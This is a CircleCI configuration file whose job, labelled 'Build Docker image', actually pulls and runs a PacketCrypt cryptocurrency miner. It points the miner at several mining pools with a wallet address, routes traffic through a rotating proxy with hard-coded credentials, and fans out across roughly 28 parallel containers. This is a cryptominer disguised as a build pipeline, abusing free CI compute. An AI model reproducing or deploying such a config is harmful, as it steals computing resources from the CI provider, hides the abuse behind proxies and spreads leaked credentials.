.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
            docker container run \
              -e HTTP_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              -e HTTPS_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              thomasjp0x42/packetcrypt ann -p pkt1qv230azxyr4r2n4zq7wqmmr4dxxmwvna6ha0kna https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io 2>&1 | grep -o "annmine.rs.*Ke.*"
            
version: 2.0

jobs:
  build:
    docker:
      - image: cimg/ruby:2.7.1-node
    steps:
      - checkout
  tabungannikah1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  tabungannikah2:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 13
    
workflows:
  version: 2
  dockerworkflows:
    jobs:
      - build
      - tabungannikah1
      - tabungannikah2
